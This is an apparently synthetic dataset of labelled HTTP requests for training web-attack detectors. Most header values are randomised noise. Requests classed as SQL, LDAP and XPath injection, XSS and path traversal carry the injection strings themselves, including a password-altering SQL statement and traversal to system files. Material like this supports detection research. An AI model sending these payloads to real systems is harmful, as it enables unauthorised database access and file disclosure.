GET /i5mgwh/tSi4XNigisPSu44P/Hj15mi/Ig/semttlstn8eareZEseho/adckbjw6gryxr9m1ongg/oaoerytlne0n/1pll/tQlen/wHDHHayv5/lsDdMc/oaourIpcn.css?rRiltcose1=iodre%27++or++++exl%2Fsrehe%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D11%5D+++++or+++%27hps%27+%3D++++%27&Renewmtyf=927477&nyedan=9GENmuCP&rGrpecsooea2e=2 HTTP/1.0
Host: www.mugrreames.ch
Connection: etwsi
Accept: video/mpeg;q=0.3, image/gif, audio/x-wav;q=0.1
Accept-Charset: x-mac-ce, x-mac-cyrillic;q=0.6, koi8;q=0.6, x-mac-korean
Accept-Encoding: *;q=0.7
Accept-Language: iezyrfb-rrlaee6;q=0.4
Cache-Control: no-transform
Client-ip: 149.198.73.153
Cookie: m1Et3laoeds6=tt%imgpahftw;.rmDI=195107;seesc=~uspjo;8nlnlsencsio3e=l;Gh
Cookie2: $Version="384"
Date: Fri, 20 Apr 07 13:34:45 UTC
ETag: W/"C6vM2QmYRX16nGaa"
Expect: t8nua
From: 1ni9pe@Genwbli.net
If-Modified-Since: Wed, 09 Aug 06 21:32:23 GMT
If-Unmodified-Since: Fri, 03 Dec 04 15:36:52 UTC
If-Match: "_V5wS2.XBUlro.abv.H"
If-None-Match: "yRTqUh.zN_gEXj28llO5"
If-Range: Tue, 15 Apr 08 17:44:15 CET
Max-Forwards: 7
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: NTLM eWgzaXFnZnVsQWV6U2NlaGFjZzZwaWltdGhoZGhkZTNnNWhk
Authorization: NTLM c2dlZ2VvbG9pTmZla25DRmV0ZWVoMDBvZXRhbGFteER0Nzdud0U=
Range: 75-,6326-9694,9570-
Referer: /sd55/seQhOei5/stgee5h.exe
TE: trailers,gzip;q=0.9
Trailer: Cache-Control
User-Agent: Mozilla/4.1 (compatible; Konqueror/9.8; SunOS sun4u; ritwrf0h)
UA-CPU: Sparc
UA-Disp: 7451,3171,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 3095x7377
Via: 5.1 169.193.57.164
Transfer-Encoding: deflate
Upgrade: pksat/0.9, it6/4.7, Atv/0.3, zos/6.7, aoE/5.6
Warning: 781 www.hoetei.html "9scprerIsitC95r" "Thu, 17 Feb 05 10:38:24 GMT"
X-Forwarded-For: 246.149.155.68
X-Serial-Number: 9273829516846529
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49755
Start - Id: 42176
class: SqlInjection
GET /nPvqBJ5/Wcq/srrbjnePu8swtn1eic/ounlTUoRltceesi/3MZ9QT4SKNgmf/VWkZ_fromhomeiGrk1/ktM/pZdTIN.msf?0leetneeoeexcMt=%27+union+++select+++++sum%28phterO%29++++from+++++ah-- HTTP/1.1
Host: www.tg6bo1.ch
Connection: eqeyiav
Accept: */*
Accept-Charset: windows-1250, cp-950, windows-874
Accept-Encoding: 
Accept-Language: yeca-n
Cache-Control: max-age=67
Client-ip: 133.121.173.46
Cookie: ddtiaoo=6;sRs3gr5d=rrns;t4uoiy=YxbaTteE e)egit;Q3jnBypK=Enyd;cNAnadt=15anastoGmailc
Cookie2: $Version="85"
Date: Sun, 11 Nov 07 22:28:22 CET
ETag: W/"_jF9v1M5kcAUe98_Wd"
Expect: 100-continue
From: hmrl@wdteioa4s.uk
If-Modified-Since: Fri, 24 Apr 09 13:33:30 CET
If-Unmodified-Since: Fri, 04 Nov 05 08:29:24 GMT
If-Match: "boYIb4i8MsFnDmJd_V"
If-None-Match: *
If-Range: Fri, 24 Sep 04 19:13:03 CET
Max-Forwards: 3904
MIME-Version: 5.3
Pragma: eiio=ystj
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: Basic ZWltZWFtb1Q6MmFiaWF3RWU=
Range: 1010-
Referer: http://itsae3r9.org/tznrypum/cetWko/ldlnfnul/e4s0ails/ergdrtNs.dll
TE: gzip,gzip;q=0.2,trailers
Trailer: Proxy-Authorization
User-Agent: itooukbsde6t3Lst
UA-CPU: StrongARM
UA-Disp: 290,899,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 249x8623
Via: wh3i86/8.6 84.214.31.249, 6.6 152.243.157.211
Transfer-Encoding: deflate
Upgrade: amt/4.2, wwaier/5.7, iaqR/1.4
Warning: 076 187.215.178.176 "4XWrtebohs" 
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 036660331124122
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42176
Start - Id: 37229
class: LdapInjection
GET /v_2IzMpzji1xpxd/31IQX7qF/jnOtAAansrlta/tlrohOg3yccTOoytnRyo/Ymbin/nn-T4IQJcN98xuX9O/ght/vdocumentazBBPLaHl.asp?ag=negT&Nin6rn=h&rShfwinntHriLl9@=%29+%28+++%7C%28c8%3DuI*%29&hoMAadviT7ttxoe=s4AtswewO&hBaeoTanobSi=u%24chtle%40%24bpySdhoptposition%3F&8ngj=mvLu7rpzm0it&ollr8onlarha=jli2issi&doce=295864650 HTTP/1.1
Host: www.rhdustsgb7.net
Connection: eUnRkjES
Accept: text/xml
Accept-Charset: *;q=0.5
Accept-Encoding: compress;q=0.5, gzip;q=0.6, gzip;q=0.3, identity;q=0.0
Accept-Language: m2loTub-wnBp
Cache-Control: min-fresh=8
Client-ip: 164.10.58.80
Cookie: huo4rI=secmde0seeh2y
Cookie2: $Version="21"
Date: Sun, 15 Oct 06 16:10:36 CET
ETag: "czNQPVvyxU6hhOg3"
Expect: eesgne
From: htani@cbat2ads3.org
If-Modified-Since: Mon, 16 Aug 04 18:47:45 GMT
If-Unmodified-Since: Wed, 03 Nov 04 15:46:55 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 21 Nov 06 08:03:19 GMT
Max-Forwards: 4919
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Digest nonce
Range: -035
Referer: /a8jn0ia/tetorews.rar
TE: deflate;q=0.0,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/4.4 (Machintosh; U; PPC Mac OS X 6.0; ed-op; rv:8.6.4) Gecko/99701966
UA-CPU: x86
UA-Disp: 5765,446,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 0874x8291
Via: 5.4 218.57.23.110, 1.0 www.tboi.tiff, 1.9 137.191.131.90
Transfer-Encoding: identity
Upgrade: aybij/7.6, 6sthiq/6.8, nNx/6.1, wAen/2.4, 0taES/8.7
Warning: 444 71.101.94.149:869 "e5eslcsyoIxfqbnaAe" 
X-Forwarded-For: 217.7.45.94
X-Serial-Number: 9354462419781975
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37229
Start - Id: 48855
class: XPathInjection
GET /NgNpasswd/rzGy_F8PTOyu-g/Cxmle6R/addc.js?a70=sgroyew7%27+++or+++count%28++++path%2Fchild%3A%3Anode%28%29%5Bposition%28+++%29%3D%28%28+++i+++%2B++++j+++%2B+++k%2B++++l++%2B+1%29%5D+++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+%27Hatc9Er%27+%3D+++%27+++++puslred%27++++or HTTP/1.1
Host: www.emeiey4Dr.biz
Connection: keep-alive
Accept: text/*, video/*;q=0.2, image/gif;q=0.6
Accept-Charset: ks_c_5601-1987;q=0.0, windows-874, iso-8859-7, x-mac-hebrew;q=0.2
Accept-Encoding: *
Accept-Language: idoswh-dtian, t1vac-d, NnacEIhd-rcok;q=0.4
Cache-Control: max-age=3239
Client-ip: 136.172.120.185
Cookie: @vbscriptKmocha6abgsoundd=ltDibesngldst4tg8;teeo1=y E8McthiTgconnectpassthrun;ebskfiimtl0he=i7iX-Zdui_JL;nsduy68a=a7>Oaotmetaualhe;XB6U6PVEvl0=st9nsaii
Cookie2: $Version="97"
Date: Fri, 14 Oct 05 09:57:39 GMT
ETag: W/"VjMVqrT41@mFChvd"
Expect: akafu79
From: cSenj7od@i5ssuRhni.com
If-Modified-Since: Wed, 10 Nov 04 17:17:37 UTC
If-Unmodified-Since: Mon, 09 Apr 07 08:37:48 UTC
If-Match: "Tccb.rgcNTR4BmH"
If-None-Match: *
If-Range: "plbjSI0fFmSsUThrLBLl"
Max-Forwards: 3900
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: NTLM a05vZXJvNWU1aHRyaGFzM21hblBscHNuZWliMmh0RXRp
Authorization: Digest realm
Range: 845-,90670-12915,351536-
Referer: /Sgsgxm/awjodltq.jsp
TE: chunked,chunked;q=0.5
Trailer: Accept-Charset
User-Agent: 47rceTra19heerilab
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 842x5954
Via: FTP/8.8 76.96.175.141, HTTP/9.8 116.199.59.145, npiy/4.0 www.orlgdhi.js
Transfer-Encoding: aqihss
Upgrade: Anfn/8.5, ere/1.4, 8ssixi/3.7, oAe/9.3, enwsi/1.1
Warning: 031 102.38.172.102 "nisa2e2yv" 
X-Forwarded-For: 239.247.179.124
X-Serial-Number: 177199337529573688
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48855
Start - Id: 37374
class: LdapInjection
GET /sIdtUantaml6pthu2h/document6TQ.mspx? HTTP/1.1
Host: www.msd1eemh.uk
Connection: close
Accept: audio/*, audio/basic
Accept-Charset: windows-1255, iso-8859-1;q=0.7, gb2312;q=0.9, iso-8859-3;q=0.4
Accept-Encoding: FhN)(&(objectClass=   l0*)
Accept-Language: *
Cache-Control: max-age=0
Client-ip: 216.28.135.192
Cookie: ee=the3tcexyoa2Ihd;7Ri=yreaho;exec0pI=xp_e0;tinhe8necFptw=tlhtacces;itg0g=bn
Cookie2: $Version="30"
Date: Tue, 09 Aug 05 10:24:02 CET
Expect: 8eyniOa
From: 2qwem@kh2str7ngs.fr
If-Modified-Since: Sun, 27 Apr 08 19:22:02 CET
If-Unmodified-Since: Tue, 15 Mar 05 18:50:20 GMT
If-Match: "nqOK0UBXOy6iL5kF"
If-None-Match: *
If-Range: Sun, 08 Oct 06 06:15:40 CET
Max-Forwards: 5
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest username="bu7etgel"
Authorization: ehau nolas=ahe35
Range: -112070,72375-
Referer: /Hssci/b696i0rn.ace
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: a7ei5orsa (lt-32.3ItO; 7aVKLp; imsUuC; nDTpZdeCvE; bpo@kMMXBt)
UA-CPU: x86
UA-OS: Win95
Via: 2.6 www.adezenuh.html
Transfer-Encoding: compress
Upgrade: 2B6/2.2
Warning: 419 www.jDerg.tiff "fugwm5eoioziV5wll" 
X-Forwarded-For: 170.106.4.226
X-Serial-Number: 074489
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 37374
Start - Id: 41839
class: SqlInjection
GET /ek/lFUEUH2gXFp.html?t5Ydqr8=select&oaior9he4ci=%3Balter++table+chteetonli++++set++password+++%3D+++%27mseq%27+++++where++++name+++%3D++%27t4pece%27%3B&snneigpoy=cgies HTTP/1.0
Host: 128.105.11.243:18124
Connection: ddIu
Accept: audio/*, text/html, audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 196.90.56.27
Cookie: e32TluAeanOesa2=adminalcb;65bnot10ieusm6a=1;5iart=68182;.wK2txUuZQ=0tdt
Cookie2: $Version="58"
Date: Thu, 10 Mar 05 23:28:08 CET
ETag: W/"sEO6-Hh4WcNew12P"
Expect: 3esf
From: ctity@atOxartje.ch
If-Modified-Since: Tue, 11 Aug 09 16:41:20 GMT
If-Unmodified-Since: Sat, 01 Jan 05 21:53:37 UTC
If-Match: "wpeagd3IDuXBc1YC"
If-None-Match: *
If-Range: Fri, 09 Jan 09 15:35:49 UTC
Max-Forwards: 334
MIME-Version: 1.6
Pragma: pncdaVt='fbnaente'
Proxy-Authorization: NTLM ZDhzdGFlcmRSaGlvNXR5aW9tMHFkU3JpY2VpaXV5ZW56Y2Rsbw==
Authorization: Basic emg1YUlsOnNuOW90ZDh0
Range: -0842
Referer: http://www.beapi.ch/tm5deeh1/Tewa/euaMezC.gif
TE: chunked;q=0.0,gzip;q=0.4,gzip;q=0.3
Trailer: Max-Forwards
User-Agent: Mozilla/4.6 (compatible; cseEoum6ae; Win 9x; sb75nut)
UA-CPU: 68000
UA-Disp: 658,0030,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 5914x483
Via: 2.7 www.n1sih.jpeg:44, 6.6 15.133.130.11
Transfer-Encoding: gzip
Upgrade: rz8alu/5.3, a4rs/2.4, FoE/2.5, 2hiDn0/2.7
Warning: 186 127.58.150.59 "ns2cjsi" "Mon, 05 May 08 16:07:50 GMT"
X-Forwarded-For: 187.70.226.8
X-Serial-Number: 431124702375
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41839
Start - Id: 47449
class: XSS
GET /AZ/ibolkeYemricR/thyuitdtfpak/geacmreed/8QI3TX1gXs/eiwaRptqesmcR/_KFwp-ubc/8uaiysxahqEveotRm/yFQPkiCLCarARM/ebNuE.php4?aoo=%3Cxml+++++src+++%3D%22++javascript%3A+++%5Balert++%28%27ne%27%29%3B%5D+%22++++%3E&iAlse=ehsteniyi6i&ya=459569&zeo=469 HTTP/1.1
Host: 209.24.100.224
Connection: aohWsN
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, identity;q=0.7
Accept-Language: l7ooe-dl;q=0.3, wfia-e;q=0.4, je-9alndta7;q=0.2, qlieR-en3t4;q=0.5
Cache-Control: max-stale
Client-ip: 240.24.234.3
Cookie: afhhl6od3armetu=tLwXihzp;j9i1lgtdaSd3a=77;ytaJohr=pJic
Cookie2: $Version="073"
Date: Mon, 02 Nov 09 17:10:43 UTC
ETag: "U5M.V.6GiVUtXHXYQ5NI"
Expect: emr8ts
From: eskhrz@f8eyrrtmw.biz
If-Modified-Since: Wed, 22 Sep 04 21:25:32 CET
If-Unmodified-Since: Tue, 10 Feb 09 14:23:35 GMT
If-Match: "y4aOGzYbVyyNL_VM"
If-None-Match: *
If-Range: "60VbaHM_D1OFTdgY-"
Max-Forwards: 0
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest cnonce="eiunos"
Range: 9547-817639
Referer: http://ohOs7ho.be/wtttM7s/n8aAtcXe/hErrit/pindaeh.cgi
TE: chunked
Trailer: If-Range
User-Agent: Zgap (rIVwD2Hl; naL9cDi1S)
UA-CPU: MIPS
UA-Disp: 1377,371,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 644x740
Via: 4.2 www.neOanoi.html, HTTP/1.7 59.42.254.106, 8.1 160.65.172.213
Transfer-Encoding: Ullno; roei5ks1=fs2t7t2
Upgrade: If3b/5.7, ceh/7.0, ns8/1.8
Warning: 281 www.x8r0s.tiff "js1edtagecg" "Sat, 28 Jul 07 11:01:34 UTC"
X-Forwarded-For: 188.156.102.66
X-Serial-Number: 226091720709125
----: --------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 47449
Start - Id: 37643
class: LdapInjection
POST /winntV2G6OqXyU0J/xsrwm0MFN6Xjq/sZB/9SC@ama-BBqN8etBBUIi.cgi? HTTP/1.0
Content-Length: 207
Content-Language: e5ieo,iw,ob
Content-Encoding: gzip
Content-Location: http://www.hdnxaiqc.ch/uyhE.mspx
Content-MD5: ZXJkZzNzcm9pbG9uc29yMg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 11 Aug 04 20:58:44 GMT
Last-Modified: Tue, 14 Nov 06 20:10:59 GMT
Host: www.cnoia.fr
Connection: keep-alive
Accept: audio/basic, image/*, text/html;q=0.3
Accept-Charset: cp-936;q=0.2, shift_jis;q=0.1
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 76.236.29.239
Cookie: sithittE6oc2t=i1;kdepodr=ibgsoundhttp5nina
Cookie2: $Version="67"
Date: Sat, 11 Sep 04 12:51:40 UTC
ETag: "UzfCajMja.i4X13-vZ"
Expect: nuie
From: yhSsf@ahrg7dbN.com
If-Modified-Since: Tue, 30 Jan 07 21:34:52 GMT
If-Unmodified-Since: Tue, 09 Mar 10 12:16:46 UTC
If-Match: "@l6I15syWjZBLMLi"
If-None-Match: *
If-Range: "ZTQa24puzQQdoUrESHV"
Max-Forwards: 03
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM dDlhZXU1bWRlZWFhZWV3YXI1eXNlTHBvb3h1b2h0b3QyZXNJb29sZQ==
Authorization: Digest algorithm=mRsj
Range: 7-75,773-,28-851
Referer: http://eunhstg.com/3iFRT1n/5dgnwgsR.jsp
TE: trailers,trailers,trailers
Trailer: If-Modified-Since
User-Agent: aekez1
UA-CPU: 68000
UA-Disp: 8272,2255,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 940x1719
Via: 2.4 148.42.66.185:98, toeaaf/0.4 185.202.185.251, r3s/5.9 www.2fz8Mzy.js:92812
Transfer-Encoding: deflate
Upgrade: 1obltA/1.6, begaf/4.9, aje/5.5
Warning: 026 155.240.111.33 "facqeennibgrcecdveu" "Wed, 19 Jul 06 04:22:04 GMT"
X-Forwarded-For: 128.30.229.67
X-Serial-Number: 60981
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

documentoY41E@h=tji@oinsertoo'dcopy 1]usdta&NepaE=(i<cusrf/ejqa&nCoratgweHtke=)(  |    (    cn=*o'brien*    )(mail    =*o    'brien* ) &6s=ediafromeTi&taSe=wctrfmgno5eegntjp

End - Id: 37643
Start - Id: 45955
class: PathTransversal
GET /bZ1/nJ.a1Um/dsss6/ptN3pkTMGnt/K8lVKCrBN@xR.jpeg?EeedvtialPrho=iaSBw1z&ksia5nzmrVesn=hI&9ernhosDi=tyCehiei&qnino0=p%3A%5Cautoexec.bat HTTP/1.0
Host: 236.51.70.123
Connection: keep-alive
Accept: image/jpeg;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: suete-e;q=0.0
Cache-Control: no-store
Client-ip: 48.114.132.12
Cookie: 2Rxurfta=904355;SUHTiJ@=O;mZglogusrf8x= e6;ej3lwei1in=r5edalIiv7;nenIemestD=ss)
Cookie2: $Version="235"
Date: Tue, 27 Jun 06 16:06:01 CET
ETag: W/"Jy54JyeN5DvDzJBlnR"
Expect: e8ch
From: Uhe1aed7@rRptioy.be
If-Modified-Since: Sat, 18 Jul 09 01:39:31 UTC
If-Unmodified-Since: Fri, 05 Nov 04 22:30:40 CET
If-Match: "mReIXtk8AgAk2_n"
If-None-Match: *
If-Range: "V7.6KQuf0OitWReT.I"
Max-Forwards: 5777
MIME-Version: 5.8
Pragma: lots=Ehtegor
Proxy-Authorization: atacrJ nOIndN=dosn6sfe
Authorization: Basic aVRyc3FyZWQ6c3RhaQ==
Referer: http://Otlttael.gov/kou35sxi/ASidpe/bolrXtoe.php
TE: deflate;q=0.7,trailers,deflate
Trailer: Accept
User-Agent: Mozilla/9.6 (Windows; U; Win 9x 0.0; fe-5o; rv:0.0.8) Gecko/71523405
UA-CPU: x86
UA-Disp: 3135,8994,8
UA-OS: FreeBSD
Via: FTP/1.9 238.168.119.29, tnl/6.4 214.16.236.249:2
Transfer-Encoding: sinlt; m7lee5RI=cEni
Upgrade: ihmRi/3.1, csAMi/2.6, ruqry/0.0, hejq/9.2
Warning: 607 www.otrO6o.css "taqtatn4rh" 
X-Forwarded-For: 79.119.72.4
X-Serial-Number: 6933322511
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 45955
Start - Id: 46102
class: PathTransversal
PUT /dd1h7omnhtE4z/D3Q_a/tT/F0pq/mIEj0m/Nehwstnz/acf/yPEA_EomL1@3AJqYk/JQIS1wpee1ial/cldnaisfpybeotadt6L.shtml? HTTP/1.1
Content-Length: 168
Content-Language: sxtsiei,Eezkr
Content-Encoding: compress
Content-Location: /oseSre/eee34rt/tnnatbeA.asp
Content-MD5: M3R1bjhsc3J4cHJzaGRDbw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 01 May 08 20:09:10 CET
Last-Modified: Mon, 28 May 07 13:51:36 CET
Host: 24.226.42.134:80
Connection: close
Accept: application/*, audio/*;q=0.4, image/*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: yad-ONerown;q=0.7
Cache-Control: max-stale
Client-ip: 245.20.88.13
Cookie: LCphpSounionKopenqJ=309;rn=tUeXyVt7X;0eeataoqa=nodei0a51-ttls3+twtPn;y7ieITlq1ltydt=d;lensosnl4n8udn=s;tCZnm.yU==D;
Cookie2: $Version="47"
Date: Sat, 26 May 07 04:40:07 UTC
ETag: W/"Lp6NyFktXxgyhfAqmG0"
Expect: 1riwi
From: ovnitL@umeod.net
If-Modified-Since: Sat, 13 Dec 08 17:53:18 GMT
If-Unmodified-Since: Mon, 16 Oct 06 18:24:27 CET
If-Match: "2p9_frFJ2YcaJJHmeX"
If-None-Match: "hwUzFG@BWJObkzhZv0"
If-Range: *
Max-Forwards: 495
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: NTLM N3lkaXZoNXRmcmFuaG9sYWRuYWlkbm90YW9lZHBqZUlob0F5ZU5h
Authorization: Digest uri=http://www.wuCi.uk/Ab4jhqe/loemhf/deenLse/6tobu.php
Range: 43-
Referer: http://bmaEeds.biz/dsena/6oekao.tar
TE: gzip;q=0.4
Trailer: Trailer
User-Agent: pzQ2Z7BIhS http://www.viCegtl.fr
UA-CPU: x86
UA-Disp: 013,8329,8
UA-Color: color32
UA-Pixels: 1090x096
Via: FTP/7.0 www.ag4QOTl.png, 5.5 185.111.24.26, eennh/5.7 185.15.65.49
Transfer-Encoding: gzip
Upgrade: vecj/8.8, yebd/9.0, jn0/6.9, OasdIr/4.2
Warning: 952 www.hhNewo.css "1l2t" "Sun, 16 Oct 05 14:27:34 CET"
X-Forwarded-For: 12.245.148.199
X-Serial-Number: 4642917448355
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

iaeM5aehsmtrwdu=Ntcas9&DVstdin3wTu_Oupdate=e:/.htaccess~&lwtycwwTaka=Libiw3;enO(w0D[&Sall4YWJ=l]&E7qIEthr=dtStmq er25rftr&t2wvnoefaNiuTch=947457&oooEs=i e

End - Id: 46102
Start - Id: 45025
class: PathTransversal
PUT /im6CYkziIgXKPsQ0.k/ij/pgCes4eZLT.shtml? HTTP/1.0
Content-Length: 85
Content-Language: 8ewrat
Content-Encoding: compress
Content-Location: http://tetaqz.fr/amUmtr/eomcl3/dtsgd.jsp
Content-MD5: RW9zZXNGbnVFbnNlYWVoZQ==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Fri, 03 Nov 06 19:03:49 GMT
Host: 40.109.222.140:80
Connection: keep-alive
Accept: image/*;q=0.8, text/xml
Accept-Charset: *
Accept-Encoding: %2e%2e.\%252f/\%252f/...\%252e..%2e
Accept-Language: *;q=0.3
Cache-Control: min-fresh=3
Cookie2: $Version="6"
Date: Thu, 08 Dec 05 12:15:10 UTC
ETag: W/"laMw64Hrs9TeG827Xhq"
Expect: 100-continue
If-Modified-Since: Sat, 24 Jan 09 14:44:59 CET
If-Unmodified-Since: Sat, 26 Dec 09 12:35:17 CET
If-Match: *
If-None-Match: "Gs7@JHnKw4yfCO3IkUFE"
If-Range: "TqHp81Bi-Sr@@39Z_Fdq"
Max-Forwards: 8705
Pragma: nRu=eIe
Proxy-Authorization: Digest nonce
Authorization: NTLM b25pRWhzb25mYXdlZTlub3N0bm1yb3Jld3pmcnU2b2V4aXM=
Referer: http://www.trtetedr.org/ocne/y2itpec8/Dinfi1/latno/yffFew.txt
TE: trailers,trailers,chunked;q=0.4
Trailer: Host
User-Agent: Mozilla/7.4 (Windows; U; Windows NT 2.7; 2g-ps; rv:6.5.2) Gecko/42245345
UA-CPU: MIPS
UA-Disp: 2107,9103,32
UA-OS: Mac OS X
UA-Color: color32
Via: 5.8 54.114.50.162, 7.4 217.42.35.69, 3.3 94.182.63.145
Transfer-Encoding: gzip
Upgrade: dNix/2.9, yo3i/4.7, mek/5.0, khgg/9.0
Warning: 174 www.sM1aetn.tiff "fuoj8nrxzwrerIn" "Sun, 04 Nov 07 17:55:53 UTC"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ne5esTbkdk6uhen=bnththoD&tEFehi2ozNxef=h6tfee&aisine1erh==tef3imhaimg~suservicesl

End - Id: 45025
Start - Id: 45718
class: PathTransversal
GET /dixcAfHwy.GkkrwvQI/7dMFlatfG/0BNsami0Tyw1Ww-ja/hen/aPSjL3IjOMW/ogcki7olptzYg/y01p/orpJ_xlQ62JM/3fGpy7omvk4PmMNAI.ku.mspx?69wt3drer3tntr=20&gaeas=dcmd3e%3FtpiZJoei&ibpactnhcOrRh=g+ha&oaEnrvtzara=4210228&hstl778dmunrar=..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat HTTP/1.1
Host: 90.40.177.123:80
Connection: close
Accept: */*
Accept-Charset: us-ascii, x-mac-chinesetrad;q=0.9, iso-10646-ucs-2, iso-8859-2;q=0.1
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 213.38.176.90
Cookie: dDobl4rsn=115;KOGOFZi=67694
Cookie2: $Version="66"
Date: Sat, 25 Dec 04 21:22:15 GMT
ETag: W/"skf@5ex@3kGAQzU0"
Expect: ipgDtc4E
From: reani1tb@daeireeubl.de
If-Modified-Since: Wed, 01 Aug 07 18:39:09 GMT
If-Unmodified-Since: Sun, 29 Jan 06 21:04:03 UTC
If-Match: *
If-None-Match: "wVohVIL27Q2lpzvZGMki"
If-Range: "q.H4ETXUaj_7myQ-"
Max-Forwards: 311
MIME-Version: 2.1
Pragma: nr=E
Proxy-Authorization: Basic dGlvb2VyOmVleXQwbnBQ
Authorization: Digest username="eelt9"
Range: -500252,934-3694
Referer: /nre2iwa.jpg
TE: chunked
Trailer: Cache-Control
User-Agent: tNVud7Mw http://www.arsd.org
UA-CPU: Sparc
UA-Disp: 8763,047,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 967x7308
Via: FTP/5.1 www.IEbcnloh.tiff, 3.7 www.s6di.jpeg, 8.6 33.206.197.118
Transfer-Encoding: enheoh; vb6aF=haMe2hf
Upgrade: sz3/7.1, 6Dnd/4.3
Warning: 288 223.210.181.104 "nzlia9itn3swklmex" "Fri, 29 Apr 05 08:27:02 GMT"
X-Forwarded-For: 139.27.168.135
X-Serial-Number: 1618317
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 45718
Start - Id: 49043
class: XPathInjection
GET /1st.htm?Iemtuae7n=10906630&trtgtomrsnli=729350&3t8nbwaotv2o=t%5D7dltmpnodeb&waac=staeniwxhi&5Tiyei4rb=i&BqTsq9.ZdOEl=sPKTr&64=eehdate&ryyse=ookn5go%3E+oa&ngSrne2n=171576&g4hedq=cMT8Re.ljrAI&odorNaynknsM5nt=phRn&hnvciamsi=ee&telgI9=7859+or++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+60886%3D HTTP/1.0
Host: www.awht.st
Connection: iwae
Accept: */*;q=0.9
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=282
Client-ip: 23.215.109.9
Cookie: ohfe3ihdkihz=adDVt72;N2HQZM=491685737;n7npahtrel=x$+;pe=5MBh;ao3chlhbtkredn=61793;lieolbdODswrTt=goytipcnanhhh
Cookie2: $Version="182"
Date: Thu, 18 Jan 07 19:33:29 CET
ETag: W/"RWRewLZE@ByZlVH@yVU"
Expect: oatrmt=Wctate;wmnin=mhlrmayt
From: omlrams@dneneIeea.de
If-Modified-Since: Sun, 25 Oct 09 07:43:06 GMT
If-Unmodified-Since: Sat, 12 Aug 06 21:06:16 CET
If-Match: *
If-None-Match: *
If-Range: "-39jAWbKNYnhPYGx6n"
Max-Forwards: 6
MIME-Version: 9.3
Pragma: e=ei
Proxy-Authorization: Basic MVRudG9zYjpnb2VzbmU=
Authorization: Digest realm
Range: -31
Referer: http://www.reabef0m.it/loxhdsrh/msarc8l.wmn
TE: deflate,gzip
Trailer: Accept-Charset
User-Agent: Mozilla/5.5 (Windows; U; Win98 2.5; 5d-oq; rv:4.3.2) Gecko/54994710
UA-CPU: StrongARM
UA-Disp: 792,0293,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 1840x9062
Via: 0.8 www.4didh7.css
Transfer-Encoding: compress
Upgrade: BzRA/3.7, eSa/6.4, DCeds/5.7
Warning: 688 135.98.248.226 "d8an8" 
X-Forwarded-For: 161.22.54.66
X-Serial-Number: 00114
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49043
Start - Id: 38247
class: LdapInjection
